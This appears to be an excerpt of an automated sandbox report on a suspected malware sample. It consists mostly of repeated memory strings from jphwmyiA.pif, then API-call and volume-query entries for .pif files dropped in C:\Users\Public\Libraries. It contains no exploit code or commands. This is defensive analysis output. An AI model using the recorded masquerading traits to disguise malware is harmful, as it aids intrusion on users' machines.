Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4_h&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhf
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qt?y&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`Vs*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qtVE&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qD\|P&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$Ko*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0cq
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0Rz*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\9b
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$Kn
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd/
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qH^X*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q49k&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<Is*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qp"\&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qx2d*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@xh
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|zf*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qWF&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qtj^&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$4/&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q no&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(\|1&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$/F&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<_^*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlkX*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(-x&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|)g&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd!
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qDVS&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0ul&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(mt*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(/8&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qpl-&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdL
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$%r*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdJ
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|?R&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\.f
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q 8l
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdX
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managernager
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql]~*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdS
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdT
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh+g*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd=
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0,}*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qD@h&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlOb
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd9
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0Bh*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\2D&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`6~
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(2`&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql"j&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdB
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@3z*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q _-&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,2R&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdn
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdk
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qt2r*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qxzt*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qtH]*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qds
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdt
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@AT*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q 5n
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdr
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qx?`&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\j1&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd^y&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@vs
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX"/&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@Ie*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdZ
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdh
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4^p
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdf
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|mY
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`4a
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,W{*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(Fm
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql3m&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(%d*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qp{o&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$]^&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`26&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<oo
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd~
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0di&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd\|
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,mf*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhE`
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<tc*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`(
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@kf&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`4
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0\a
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX]B&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$D^
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXFv&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q Pp*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`#
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8m`
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`L
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`:h
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`G
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTM-&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@9A&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`Q
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`O
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`P
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(Ge&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`N
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`;
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<vY
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`D
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$Eg
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qtPq&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`B
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\]4&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`h
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`p
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`m
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@"u&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhG}
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`\
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q_x
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`Z
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`U
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$:w*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8dM&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$Pb*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qD93&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q @L&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlPv
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`8s
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`y
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`u
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`v
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qtau
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`~
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q{
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8}
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qxgd*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\vu&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX.s&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qn
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8q

Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	8_2_02835A78
Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetLocaleInfoA,	8_2_0283A790
Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetLocaleInfoA,	8_2_0283A744
Source: C:\Windows\SysWOW64\brightness.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	8_2_02835B84
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: GetLocaleInfoA,	12_2_00417A20
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	13_2_02995A78
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: GetLocaleInfoA,	13_2_0299A790
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	13_2_02995B83
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: GetLocaleInfoA,	16_2_00417A20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: GetLocaleInfoA,	16_1_00417A20

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
